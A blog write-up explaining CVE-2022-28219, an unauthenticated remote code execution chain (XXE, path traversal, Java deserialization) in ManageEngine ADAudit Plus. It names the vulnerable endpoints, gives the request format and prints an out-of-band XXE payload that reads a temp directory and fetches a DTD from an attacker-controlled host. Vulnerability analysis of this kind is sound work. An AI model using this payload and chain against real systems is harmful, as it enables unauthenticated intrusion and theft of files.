Zoho ManageEngine AD Audit Plus CVE 2022-28219 : Unauthenticated RCE

Zoho ManageEngine AD Audit Plus CVE 2022-28219 : Unauthenticated RCE

CVE-2022-28219 is a tale of several vulnerabilities chained together to achieve RCE. This issue was reported by Naveen Sunkavally of Horizon3.ai

TLDR ;

ManageEngine AD Audit Plus is affected with a series of vulnerabilities like XXE Injection, Java De-serialization and Path traversal; which can be chained together to achieve Remote Code Execution in any version prior to 7060.

What makes this more interesting is all these vulnerabilities can be exploited without any authentication [ no username and password is required to the affected product ] !!!

Introduction

ManageEngine® is an innovative producer of Enterprise IT Management Software, offering high-end functionality of large network management frameworks at cost-effective prices to enterprises world-wide.

AD Audit Plus

AD Audit Plus is an User behavior Analytics driven audit engine, which monitors user activities in an Active directory environment. It is basically a SIEM [Security Information and Event Management] tool. According to the information from their website, AD Audit plus monitors the following information

Features

AD Audit Plus Dashboard


Detailed explanation on the discovery

Following are the information I gathered while exploring in detail about this vulnerability :

  • Endpoints are checked one by one, using the web.xml file. And the researchers found /cewolf/ can be accessed by anyone without logging in.
  • Upon checking the source code of cewolf; there was a function which actually reads the contents from a local file and de-serializes them.

  • For this de-serialization to work, we must have a file in the local system of the target machine.

    We can use this function to pass the local file path using a imgkey parameter in a HTTP request ; which passes this path to the vulnerable function in order to de-serialize the contents. image.png

    The problem here is that we should have access to the internal file system in order to exploit this vulnerability, which is not possible at all times.

  • But to my surprise, the team also found an unauthenticated endpoint affected with XML External Entities (XXE) which uses the default DocumentBuilderFactory of Java. The affected endpoint /api/agent/tabs/agentData expects a JSON post data in the following format.

    The only pre-requisite that an attacker needs to know ahead of time is the name of the fully qualified Windows domain that the ADAudit Plus application is monitoring.

      [
          {
              "DomainName": "<DOMAIN_NAME>",
              "EventCode": 4688,
              "EventType": 0,
              "TimeGenerated": 0,
              "Task Content": "<XXE_PAYLOAD>"
          }
      ]
    
  • We can use XML External Entities (XXE) to upload files to remote system and also find the location using the following steps:

    1. We can use jar protocol in XXE to upload a malicious zip file to %temp% directory and the server will unzip the archive and delete it from the %temp% directory
    2. To stop the server from deleting the jar file, we have to keep the HTTP connection as open. So that the server will write the received contents to the file, but waits for the HTTP connection to close. To achieve this we can use this modified web-server which will hang on purpose.
    3. But still we need to know the location of the downloaded jar file in %temp% directory; to do that we can use this tool which will download all the files in the %temp% directory using the following XXE payload in the affected parameter.

       <?xml version="1.0" encoding="UTF-8"? >
       <!DOCTYPE data [
           <!ENTITY % file SYSTEM "file:///c:/users/a-jsmith/appdata/local/temp/">
           <!ENTITY %dtd SYSTEM "http://10.0.220.200:3000/data.dtd"> %dtd;
       ]>
       <data>&send;</data>\n
      

      xxe-ftp-serverImage Credits: horizon3.ai

  • Now we can upload a malicious jar file and find the path of the uploaded file using XXE. So we can now exploit the deserialization vulnerability in the /cewolf/ endpoint.

Pop CalcImage Credits: horizon3.ai


References:

Did you find this article valuable?

Support Mohanraj R by becoming a sponsor. Any amount is appreciated!